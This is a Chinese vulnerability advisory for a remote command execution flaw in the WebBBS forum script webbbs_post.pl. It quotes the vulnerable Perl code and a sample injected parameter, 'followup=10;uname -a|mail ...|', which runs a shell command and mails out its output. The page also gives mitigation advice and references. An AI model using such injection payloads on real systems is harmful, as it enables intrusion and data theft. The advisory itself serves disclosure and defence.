漏洞信息详情
WebScripts WebBBS远程命令执行漏洞
漏洞简介
WebBBS是一款由Darryl Burgdorf维护的基于WEB的论坛程序,以简单文本文件存储信息。 WebBBS脚本对用户提交的输入缺少正确的过滤,远程攻击者可以利用这个漏洞以WEB进程的权限在系统上执行任意命令。 WebBBS没有正确过滤来自CGI参数上的元字符,攻击者可以提交包含\";\"或者\"|\"等元字符来执行额外命令,问题存在于webbbs_post.pl脚本中: if ($FORM{\'\'followup\'\'}) { $followup = \"$FORM{\'\'followup\'\'}\"; } ... if ($followup) { ... $subdir = \"bbs\".int($followup/1000); open (FOLLOWUP,\"$dir/$subdir/$followup\"); ... 使用如\"followup=10;uname -a|mail [email protected]|\"代替\"followup=10\"变量就可能以WEB权限在系统上执行任意命令。
漏洞公告
临时解决方法: 如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
* 修改程序,严格过滤用户输入数据。 厂商补丁: WebScripts ---------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://awsd.com/scripts/webbbs/
参考网址
来源: BID 名称: 5048 链接:http://www.securityfocus.com/bid/5048 来源: XF 名称: webbs-followup-execute-commands(9378) 链接:http://www.iss.net/security_center/static/9378.php 来源: BUGTRAQ 名称: 20020618 WebBBS 5.0 (andlater versions) vulnerable: allow commands execution via "followup" bug 链接:http://cert.uni-stuttgart.de/archive/bugtraq/2002/06/msg00232.html 来源:NSFOCUS 名称:3018 链接:http://www.nsfocus.net/vulndb/3018
受影响实体
- Affordable_web_space_design Affordable_web_space_design_webbbs:4.0<!--2000-1-1-->
- Affordable_web_space_design Affordable_web_space_design_webbbs:4.1<!--2000-1-1-->
- Affordable_web_space_design Affordable_web_space_design_webbbs:4.10<!--2000-1-1-->
- Affordable_web_space_design Affordable_web_space_design_webbbs:4.11<!--2000-1-1-->
- Affordable_web_space_design Affordable_web_space_design_webbbs:4.12<!--2000-1-1-->
补丁
暂无
还没有评论,来说两句吧...